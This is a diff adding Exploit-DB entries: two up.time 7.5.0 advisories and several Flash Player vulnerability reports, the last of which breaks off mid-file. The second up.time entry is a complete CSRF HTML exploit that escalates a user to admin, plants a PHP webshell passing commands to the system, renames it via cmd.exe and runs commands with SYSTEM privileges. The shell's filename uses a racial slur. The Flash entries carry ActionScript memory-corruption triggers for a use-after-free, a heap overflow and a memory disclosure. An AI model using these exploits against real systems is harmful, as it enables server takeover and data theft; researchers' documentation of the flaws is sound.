@@ -0,0 +1,35 @@
+
+up.time 7.5.0 Arbitrary File Disclose And Delete Exploit
+
+
+Vendor: Idera Inc.
+Product web page: http://www.uptimesoftware.com
+Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
+
+Summary: The next-generation of IT monitoring software.
+
+Desc: Input passed to the 'file_name' parameter in 'get2post.php'
+script is not properly sanitised before being used to get
+the contents of a resource and delete files. This can be
+exploited to read and delete arbitrary data from local
+resources with the permissions of the web server using a
+proxy tool.
+
+Tested on: Jetty, PHP/5.4.34, MySQL
+           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2015-5253
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php
+
+
+29.07.2015
+
+--
+
+
+http://127.0.0.1:9999/wizards/get2post.php?file_name=C:\\test.txt
diff --git a/platforms/php/webapps/37888.txt b/platforms/php/webapps/37888.txt
new file mode 100755
index 000000000..f893d7a02
--- /dev/null
+++ b/platforms/php/webapps/37888.txt
@@ -0,0 +1,243 @@
+
+up.time 7.5.0 Upload And Execute File Exploit
+
+
+Vendor: Idera Inc.
+Product web page: http://www.uptimesoftware.com
+Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
+
+Summary: The next-generation of IT monitoring software.
+
+Desc: up.time suffers from arbitrary command execution.
+Attackers can exploit this issue using the monitor service
+feature and adding a command with respected arguments to given
+binary for execution. In combination with the CSRF, Privilege
+Escalation, Arbitrary text file creation and renaming that
+file to php for example in arbitrary location and executing
+system commands with SYSTEM privileges.
+
+Tested on: Jetty, PHP/5.4.34, MySQL
+           Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
+
+
+Vulnerability discovered by Ewerson 'Crash' Guimaraes
+                            @zeroscience
+
+
+Advisory ID: ZSL-2015-5254
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php
+
+
+29.07.2015
+
+--
+
+
+<html>
+ <head>
+ <title>Uptime Exploit</title>
+ </head>
+
+<body onload="runme();">
+
+
+<!-- Login --> 
+<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
+      <input type="hidden" name="username" value="sample" />
+      <input type="hidden" name="password" value="123456" />
+    </form>
+
+<!-- Escalate privileges --> 
+   <form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
+      <input type="hidden" name="operation" value="submit" />
+      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
+      <input type="hidden" name="username" value="sample" />
+      <input type="hidden" name="password" value="123456" />
+      <input type="hidden" name="passwordConfirm" value="123456" />
+      <input type="hidden" name="firstname" value="Sample" />
+      <input type="hidden" name="lastname" value="User" />
+      <input type="hidden" name="location" value="" />
+      <input type="hidden" name="emailaddress" value="" />
+      <input type="hidden" name="emailtimeperiodid" value="1" />
+      <input type="hidden" name="phonenumber" value="" />
+      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
+      <input type="hidden" name="windowshost" value="" />
+      <input type="hidden" name="windowsworkgroup" value="" />
+      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
+      <input type="hidden" name="landingpage" value="MyPortal" />
+      <input type="hidden" name="isonvacation" value="0" />
+      <input type="hidden" name="receivealerts" value="0" />
+      <input type="hidden" name="activexgraphs" value="0" />
+      <input type="hidden" name="newuser" value="on" />
+      <input type="hidden" name="newuser" value="1" />
+      <input type="hidden" name="userroleid" value="1" />
+      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
+    </form>
+
+<!-- Log-off to refresh permission --> 
+	<form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
+      <input type="hidden" name="logout" value="1" />
+    </form>
+
+<!-- Login with escalated user --> 
+	<form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
+      <input type="hidden" name="username" value="sample" />
+      <input type="hidden" name="password" value="123456" />
+    </form>
+
+<!-- Creating Monitor to  rename php shell --> 
+<form  name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
+      <input type="hidden" name="initialERDCId" value="20" />
+      <input type="hidden" name="target" value="1" />
+      <input type="hidden" name="targetType" value="systemList" />
+      <input type="hidden" name="systemList" value="1" />
+      <input type="hidden" name="serviceGroupList" value="&#45;10" />
+      <input type="hidden" name="initialMode" value="standard" />
+      <input type="hidden" name="erdcName" value="Exploit" />
+      <input type="hidden" name="erdcInitialName" value="" />
+      <input type="hidden" name="erdcDescription" value="Exploit" />
+      <input type="hidden" name="hostButton" value="system" />
+      <input type="hidden" name="erdc&#95;id" value="20" />
+      <input type="hidden" name="forceReload" value="0" />
+      <input type="hidden" name="operation" value="standard" />
+      <input type="hidden" name="erdc&#95;instance&#95;id" value="" />
+      <input type="hidden" name="label&#95;&#91;184&#93;" value="Script&#32;Name" />
+      <input type="hidden" name="value&#95;&#91;184&#93;" value="c&#58;&#92;windows&#92;system32&#92;cmd&#46;exe" />
+      <input type="hidden" name="id&#95;&#91;184&#93;" value="process" />
+      <input type="hidden" name="name&#95;&#91;process&#93;" value="184" />
+      <input type="hidden" name="units&#95;&#91;184&#93;" value="" />
+      <input type="hidden" name="guiBasic&#95;&#91;184&#93;" value="1" />
+      <input type="hidden" name="inputType&#95;&#91;184&#93;" value="GUIString" />
+      <input type="hidden" name="screenOrder&#95;&#91;184&#93;" value="1" />
+      <input type="hidden" name="parmType&#95;&#91;184&#93;" value="1" />
+      <input type="hidden" name="label&#95;&#91;185&#93;" value="Arguments" />
+      <input type="hidden" name="value&#95;&#91;185&#93;" value="&#32;&#47;C&#32;ren&#32;"C&#58;&#92;Program&#32;Files&#92;uptime&#32;software&#92;uptime&#92;GUI&#92;wizards&#92;nigga&#46;txt"&#32;"nigga&#46;php"&#32;" />
+      <input type="hidden" name="id&#95;&#91;185&#93;" value="args" />
+      <input type="hidden" name="name&#95;&#91;args&#93;" value="185" />
+      <input type="hidden" name="units&#95;&#91;185&#93;" value="" />
+      <input type="hidden" name="guiBasic&#95;&#91;185&#93;" value="1" />
+      <input type="hidden" name="inputType&#95;&#91;185&#93;" value="GUIString" />
+      <input type="hidden" name="screenOrder&#95;&#91;185&#93;" value="2" />
+      <input type="hidden" name="parmType&#95;&#91;185&#93;" value="1" />
+      <input type="hidden" name="label&#95;&#91;187&#93;" value="Output" />
+      <input type="hidden" name="can&#95;retain&#95;&#91;187&#93;" value="false" />
+      <input type="hidden" name="comparisonWarn&#95;&#91;187&#93;" value="&#45;1" />
+      <input type="hidden" name="comparison&#95;&#91;187&#93;" value="&#45;1" />
+      <input type="hidden" name="id&#95;&#91;187&#93;" value="value&#95;critical&#95;output" />
+      <input type="hidden" name="name&#95;&#91;output&#93;" value="187" />
+      <input type="hidden" name="units&#95;&#91;187&#93;" value="" />
+      <input type="hidden" name="guiBasic&#95;&#91;187&#93;" value="1" />
+      <input type="hidden" name="inputType&#95;&#91;187&#93;" value="GUIString" />
+      <input type="hidden" name="screenOrder&#95;&#91;187&#93;" value="4" />
+      <input type="hidden" name="parmType&#95;&#91;187&#93;" value="2" />
+      <input type="hidden" name="label&#95;&#91;189&#93;" value="Response&#32;time" />
+      <input type="hidden" name="can&#95;retain&#95;&#91;189&#93;" value="false" />
+      <input type="hidden" name="comparisonWarn&#95;&#91;189&#93;" value="&#45;1" />
+      <input type="hidden" name="comparison&#95;&#91;189&#93;" value="&#45;1" />
+      <input type="hidden" name="id&#95;&#91;189&#93;" value="value&#95;critical&#95;timer" />
+      <input type="hidden" name="name&#95;&#91;timer&#93;" value="189" />
+      <input type="hidden" name="units&#95;&#91;189&#93;" value="ms" />
+      <input type="hidden" name="guiBasic&#95;&#91;189&#93;" value="0" />
+      <input type="hidden" name="inputType&#95;&#91;189&#93;" value="GUIInteger" />
+      <input type="hidden" name="screenOrder&#95;&#91;189&#93;" value="6" />
+      <input type="hidden" name="parmType&#95;&#91;189&#93;" value="2" />
+      <input type="hidden" name="timing&#95;&#91;erdc&#95;instance&#95;monitored&#93;" value="1" />
+      <input type="hidden" name="timing&#95;&#91;timeout&#93;" value="60" />
+      <input type="hidden" name="timing&#95;&#91;check&#95;interval&#93;" value="10" />
+      <input type="hidden" name="timing&#95;&#91;recheck&#95;interval&#93;" value="1" />
+      <input type="hidden" name="timing&#95;&#91;max&#95;rechecks&#93;" value="3" />
+      <input type="hidden" name="alerting&#95;&#91;notification&#93;" value="1" />
+      <input type="hidden" name="alerting&#95;&#91;alert&#95;interval&#93;" value="120" />
+      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;critical&#93;" value="1" />
+      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;warning&#93;" value="1" />
+      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;recovery&#93;" value="1" />
+      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;unknown&#93;" value="1" />
+      <input type="hidden" name="time&#95;period&#95;id" value="1" />
+      <input type="hidden" name="pageFinish" value="Finish" />
+      <input type="hidden" name="pageContinue" value="Continue&#46;&#46;&#46;" />
+      <input type="hidden" name="isWizard" value="1" />
+      <input type="hidden" name="wizardPage" value="2" />
+      <input type="hidden" name="wizardNumPages" value="2" />
+      <input type="hidden" name="wizardTask" value="pageFinish" />
+      <input type="hidden" name="visitedPage&#91;1&#93;" value="1" />
+      <input type="hidden" name="visitedPage&#91;2&#93;" value="1" />
+         </form>
+
+
+<!-- Uploading php shell txt format --> 
+    <form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
+      <input type="hidden" name="file&#95;name" value="nigga&#46;txt" />
+      <input type="hidden" name="script" value="<&#63;&#32;passthru&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#32;&#63;>" />
+         </form>
+
+
+<!-- Run command to rename php shell --> 
+    <form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
+      <input type="hidden" name="section" value="RunERDCInstance" />
+      <input type="hidden" name="subsection" value="view" />
+      <input type="hidden" name="id" value="65535" />
+      <input type="hidden" name="name" value="Exploit" />
+    </form>
+
+
+<!-- Executing basic command --> 
+    <form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
+	<input type="hidden" name="cmd" value="whoami" />
+    </form>
+
+
+<iframe name="frame0"></iframe>
+<iframe name="frame1"></iframe>
+<iframe name="frame2"></iframe>
+<iframe name="frame3"></iframe>
+<iframe name="frame4"></iframe>
+<iframe name="frame5"></iframe>
+<iframe name="frame6"></iframe>
+<iframe name="frame7"></iframe>
+
+<script>
+ function runme()
+ {
+ document.login.submit();
+ document.getElementsByTagName("iframe")[0].onload = function()
+//document.write("Login....")
+ {
+document.privadm.submit();
+document.getElementsByTagName("iframe")[1].onload = function()
+//document.write("Mutating to admin uahsuasuas");
+ {
+document.logoff.submit();
+document.getElementsByTagName("iframe")[2].onload = function()
+//document.write("Refreshing perms...");
+ {
+document.login2.submit();
+document.getElementsByTagName("iframe")[3].onload = function()
+//document.write("Login again...Keep Calm....");
+ {
+document.createmonitor.submit();
+document.getElementsByTagName("iframe")[4].onload = function()
+//document.write("Creating F*cking monitor");
+ {
+document.uploadshell.submit();
+document.getElementsByTagName("iframe")[5].onload = function()
+//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
+ {
+document.run.submit();
+document.getElementsByTagName("iframe")[6].onload = function()
+//document.write("Trick to shell... come on....");
+ {
+document.exploit.submit();
+document.getElementsByTagName("iframe")[7].onload = function()
+alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+</script>
+
+</body>
+</html>
diff --git a/platforms/win32/dos/37881.txt b/platforms/win32/dos/37881.txt
new file mode 100755
index 000000000..e41ea93d6
--- /dev/null
+++ b/platforms/win32/dos/37881.txt
@@ -0,0 +1,29 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:
+
+class subso extends Sound{
+
+	public function subso(f){
+			
+	super("_level0.test");
+	var n = {valueOf : func};
+	_global.func = f;
+	_global.t = this;
+	var f2 = this.loadSound;
+	f2.call(this, n, 1);
+}
+
+function func(){
+	
+	_global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
+	return 1;
+	}
+}
+	
+
+A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37881.zip
+
diff --git a/platforms/windows/dos/37843.txt b/platforms/windows/dos/37843.txt
new file mode 100755
index 000000000..10999b327
--- /dev/null
+++ b/platforms/windows/dos/37843.txt
@@ -0,0 +1,54 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]
+
+VULNERABILITY DETAILS
+An integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.
+
+VERSION
+Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
+Operating System: Win7 x64 SP1
+
+REPRODUCTION CASE
+
+From exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp
+
+944 // Specialized to be called from Function.apply(). 
+945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) 
+946 { 
+947     int32_t argc = a->getLength(); 
+
+...
+ 
+966     // Tail call inhibited by local allocation/deallocation. 
+967     MMgc::GC::AllocaAutoPtr _atomv; 
+968     Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom));   //here if argc = 0xFFFFFFFF we get an integer overflow
+969     atomv[0] = thisArg; 
+970     for (int32_t i=0 ; i < argc ; i++ ) 
+971         atomv[i+1] = a->getUintProperty(i); 
+972     return env->coerceEnter(argc, atomv); 
+973 } 
+
+
+So the idea is to use the rest argument to get a working poc. For example:
+
+    public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {
+        
+        try {a0.writeUnsignedInt(0x41414141)}catch (e) {}
+        try {a1.writeUnsignedInt(0x41414141)}catch (e) {}
+        try {a2.writeUnsignedInt(0x41414141)}catch (e) {}
+        try {a3.writeUnsignedInt(0x41414141)}catch (e) {}
+        try {a4.writeUnsignedInt(0x41414141)}catch (e) {}
+        
+    }
+    public function XApplyPoc() {
+        var a:Array = new Array()
+       
+        a.length = 0xFFFFFFFF
+        myFunc.apply(this, a)
+    }
+
+Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip
diff --git a/platforms/windows/dos/37844.txt b/platforms/windows/dos/37844.txt
new file mode 100755
index 000000000..332b2cb77
--- /dev/null
+++ b/platforms/windows/dos/37844.txt
@@ -0,0 +1,113 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]
+
+VULNERABILITY DETAILS
+Use After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.
+
+VERSION
+Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
+Operating System: Win7 x64 SP1
+
+REPRODUCTION CASE
+Use After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.
+pepflashplayer.dll 17.0.0.134, based at 0x10000000.
+
+The setSubscribedTags is handled by sub_103255AD:
+
+.text:103255AD                 push    ebp
+.text:103255AE                 mov     ebp, esp
+.text:103255B0                 and     esp, 0FFFFFFF8h
+.text:103255B3                 sub     esp, 14h
+.text:103255B6                 push    ebx
+.text:103255B7                 mov     ebx, [ebp+arg_0]
+.text:103255BA                 push    esi
+.text:103255BB                 push    edi
+.text:103255BC                 mov     edi, eax
+.text:103255BE                 mov     eax, [ebx]
+.text:103255C0                 mov     ecx, ebx
+.text:103255C2                 call    dword ptr [eax+8Ch]    ; first get the length of the provided array
+.text:103255C8                 lea     esi, [edi+4Ch]
+.text:103255CB                 mov     [esp+20h+var_C], eax
+.text:103255CF                 call    sub_103265BB
+.text:103255D4                 mov     esi, [esp+20h+var_C]
+.text:103255D8                 test    esi, esi
+.text:103255DA                 jz      loc_1032566D
+.text:103255E0                 xor     ecx, ecx
+.text:103255E2                 push    4
+.text:103255E4                 pop     edx
+.text:103255E5                 mov     eax, esi
+.text:103255E7                 mul     edx
+.text:103255E9                 seto    cl
+.text:103255EC                 mov     [edi+58h], esi
+.text:103255EF                 neg     ecx
+.text:103255F1                 or      ecx, eax
+.text:103255F3                 push    ecx
+.text:103255F4                 call    unknown_libname_129 ;  and then allocate an array of 4*length
+.text:103255F9                 and     [esp+24h+var_10], 0
+.text:103255FE                 pop     ecx
+.text:103255FF                 mov     [edi+54h], eax   ; that pointer is put at offset 0x54 in the object pointed by edi
+
+
+Next there is a for loop that iterates over the array items and calls the toString() method of each item encountered:
+
+.text:10325606 loc_10325606:
+.text:10325606                 mov     eax, [edi+8]
+.text:10325609                 mov     eax, [eax+14h]
+.text:1032560C                 mov     esi, [eax+4]
+.text:1032560F                 push    [esp+20h+var_10]
+.text:10325613                 mov     eax, [ebx]
+.text:10325615                 mov     ecx, ebx
+.text:10325617                 call    dword ptr [eax+3Ch]   ; get the ith element
+.text:1032561A                 push    eax
+.text:1032561B                 mov     ecx, esi
+.text:1032561D                 call    sub_1007205D          ; call element->toString()
+.text:10325622                 lea     ecx, [esp+20h+var_8]
+.text:10325626                 push    ecx
+.text:10325627                 call    sub_10061703
+.text:1032562C                 mov     eax, [esp+20h+var_4]
+.text:10325630                 inc     eax
+.text:10325631                 push    eax
+.text:10325632                 call    unknown_libname_129
+.text:10325637                 mov     edx, [edi+54h]
+.text:1032563A                 pop     ecx
+.text:1032563B                 mov     ecx, [esp+20h+var_10]
+.text:1032563F                 mov     [edx+ecx*4], eax    ; write a pointer to the string in the array
+...
+.text:1032565F                 inc     [esp+20h+var_10]
+.text:10325663                 mov     eax, [esp+20h+var_10]
+.text:10325667                 cmp     eax, [esp+20h+var_C]
+.text:1032566B                 jl      short loc_10325606
+
+
+The issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.
+
+Trigger with that:
+
+    var avss:flash.media.AVSegmentedSource  = new flash.media.AVSegmentedSource ();
+    
+    var o:Object = new Object();
+    o.toString = function():String {
+        var a = [0,1,2,3];
+        avss.setSubscribedTags(a);
+        return "ahahahahah"
+    };
+    
+    var a = [o,1,2,3,4,5,6,7,8,9];
+    var i:uint = 0;
+    while (i < 0x100000) {
+        i++;
+        a.push(i);
+    }
+    avss.setSubscribedTags(a);
+
+Note: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.
+    
+Compile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.
+
+My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip
+
diff --git a/platforms/windows/dos/37845.txt b/platforms/windows/dos/37845.txt
new file mode 100755
index 000000000..089f45784
--- /dev/null
+++ b/platforms/windows/dos/37845.txt
@@ -0,0 +1,45 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+Loading a weird MPD file can corrupt flash player's memory.
+
+VERSION
+Chrome version 41.0.2272.101, Flash 17.0.0.134
+Operating System: Win 7 x64 SP1
+
+REPRODUCTION CASE
+I'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.
+
+"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:"
+
+"http://localhost/PlayManifest.swf?file=gen.mpd
+
+"To compile the .as file, I had to use special flags to flex:"
+
+"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as"
+"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)"
+
+
+On Win7 x64 sp1 with Chrome 32 bit, crash like this:
+6AA8B67C | 8B C3                    | mov eax,ebx                             |
+6AA8B67E | E8 A1 05 00 00           | call pepflashplayer.6AA8BC24            |
+6AA8B683 | EB A8                    | jmp pepflashplayer.6AA8B62D             |
+6AA8B685 | 89 88 D0 00 00 00        | mov dword ptr ds:[eax+D0],ecx           |  // crash here, eax points somewhere in pepflashplayer.dll
+6AA8B68B | 8B 88 88 00 00 00        | mov ecx,dword ptr ds:[eax+88]           |
+6AA8B691 | 33 D2                    | xor edx,edx                             |
+6AA8B693 | 3B CA                    | cmp ecx,edx                             |
+6AA8B695 | 74 07                    | je pepflashplayer.6AA8B69E              |
+6AA8B697 | 39 11                    | cmp dword ptr ds:[ecx],edx              |
+6AA8B699 | 0F 95 C1                 | setne cl                                |
+
+
+At first sight this looks to be an uninitialized stack variable but I might be wrong.
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip
diff --git a/platforms/windows/dos/37846.txt b/platforms/windows/dos/37846.txt
new file mode 100755
index 000000000..1ce47089a
--- /dev/null
+++ b/platforms/windows/dos/37846.txt
@@ -0,0 +1,64 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+Issues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked.
+
+VERSION
+Chrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134)
+Operating System: Win 7 x64 SP1
+
+REPRODUCTION CASE
+
+Compile the provided poc with flex sdk:
+mxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as
+
+And change the bytes in the DefineBitsLossless2 tag, at offset 0x228:
+ 14 00 14 00 78 to 14 00 14 00 41
+
+To get a DefineBitsLossless tag, change the byte at offset 0x220:
+ 09 47 00 00 00 to 05 47 00 00 00
+ 
+Load the provided pocs and see the pointers partially disclosed.
+ 
+When handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is.
+
+Look at sub_54732C:
+
+.text:0054746C loc_54746C:
+.text:0054746C                 mov     ecx, [esi]
+.text:0054746E                 push    0         
+.text:00547470                 push    0         
+.text:00547472                 push    eax       
+.text:00547473                 push    [ebp+var_10]
+.text:00547476                 push    [ebp+var_14]
+.text:00547479                 push    [ebp+var_C]
+.text:0054747C                 call    sub_545459              ; allocate a buffer of 4 * 14h * 14h = 640h
+.text:00547481                 cmp     [ebp+var_1], 0
+.text:00547485                 mov     ecx, [esi]
+.text:00547487                 setnz   al
+.text:0054748A                 mov     [ecx+58h], al
+...
+.text:005474DE loc_5474DE:
+.text:005474DE                 lea     eax, [ebp+var_50]
+.text:005474E1                 push    0
+.text:005474E3                 push    eax
+.text:005474E4                 call    xinflate                ; inflate the buffer, but there's no error check?
+.text:005474E9                 pop     ecx                     ; thus we can return 0xFFFFFFFD in eax with a corrupt stream
+.text:005474EA                 pop     ecx
+.text:005474EB                 cmp     eax, 1
+.text:005474EE                 jz      short loc_5474FB
+.text:005474F0                 test    eax, eax
+.text:005474F2                 jnz     short loc_54753A        ; which will skip the buffer initialization
+
+
+Reading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer.
+---
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip
+
diff --git a/platforms/windows/dos/37847.txt b/platforms/windows/dos/37847.txt
new file mode 100755
index 000000000..921f47ce0
--- /dev/null
+++ b/platforms/windows/dos/37847.txt
@@ -0,0 +1,148 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+[Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926]
+
+Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
+
+---
+VULNERABILITY DETAILS
+There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
+
+This is Issue 457278 resurrected.
+
+VERSION
+Chrome Version: [?, Flash 17.0.0.169]
+Operating System: [Windows 7 x64 SP1]
+
+REPRODUCTION CASE
+When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
+Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169):
+
+.text:004D67F8                 mov     esi, [esp+1Ch+var_4]
+.text:004D67FC                 push    1               ; char
+.text:004D67FE                 mov     ecx, ebp        ; int
+.text:004D6800                 mov     byte ptr [esi+0Ch], 1   // this flag was added
+.text:004D6804                 call    xparseAS2Code
+.text:004D6809                 mov     byte ptr [esi+0Ch], 0
+
+And when we check the function that deletes the filters:
+
+.text:004D66D0                 push    edi
+.text:004D66D1                 mov     edi, ecx
+.text:004D66D3                 cmp     byte ptr [edi+0Ch], 0  // check again the flag, and jump if it is set, so that the filter won't be deleted
+.text:004D66D7                 jnz     short loc_4D6716
+.text:004D66D9                 cmp     dword ptr [edi], 0
+.text:004D66DC                 jz      short loc_4D6708
+
+We can bypass that feature with the following code:
+
+flash.filters.GlowFilter = MyGlowFilter
+var a = tfield.filters   // set the flag to 1
+
+--- in MyGlowFilter ---
+	flash.filters.GlowFilter = MyGlowFilter2
+	var a = _global.tfield.filters   // set the flag to 1, and then set it to 0
+    
+    //now we can free the filter :D, the flag is set to 0!
+    _global.tfield.filters = []
+
+
+Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing.
+But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344.
+
+Can't we call that a -1day :D?
+
+***************************************************************************
+Content of FiltusPafusBis.fla
+
+import flash.filters.GlowFilter;
+
+var a1:Array = new Array()
+var a2:Array = new Array()
+for (i = 0; i<0x50/4;i++) {
+	a2[i] = 0x41424344
+}
+
+for (var i = 0; i<0x200;i++) {
+	var tf:TextFormat = new TextFormat()
+	a1[i] = tf
+}
+for (var i = 0; i<0x200;i++) {
+	a1[i].tabStops = a2
+}
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
+tfield.filters = [glowfilter]
+
+
+function f() {
+	for (var i = 0; i<0x20;i++) {
+		_global.a1[0x100+i*4].tabStops = [1,2,3,4]
+	}
+	flash.filters.GlowFilter = MyGlowFilter2
+	var a = _global.tfield.filters
+	
+	_global.tfield.filters = []
+	for (var i = 0; i<0x200;i++) {
+		_global.a1[i].tabStops = a2
+	}
+	
+}
+
+_global.tfield = tfield
+_global.f = f
+_global.a1 = a1
+_global.a2 = a2
+
+flash.filters.GlowFilter = MyGlowFilter
+var a = tfield.filters
+
+***************************************************************************
+Content of MyGlowFilter.as:
+
+import flash.filters.GlowFilter;
+class MyGlowFilter extends flash.filters.GlowFilter {
+       public function MyGlowFilter (a,b,c,d,e,f,g,h) 
+       {
+            super(a,b,c,d,e,f,g,h);
+            _global.f()
+       }
+}
+
+***************************************************************************
+Content of MyGlowFilter2.as:
+
+import flash.filters.GlowFilter;
+class MyGlowFilter2 extends flash.filters.GlowFilter {
+       public function MyGlowFilter2 (a,b,c,d,e,f,g,h) 
+       {
+            super(a,b,c,d,e,f,g,h);
+       }
+}
+
+***************************************************************************
+Content of FiltusPafusBis_poc.fla
+
+import flash.filters.GlowFilter;
+
+var tfield:TextField = createTextField("tf",1,1,2,3,4)
+var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
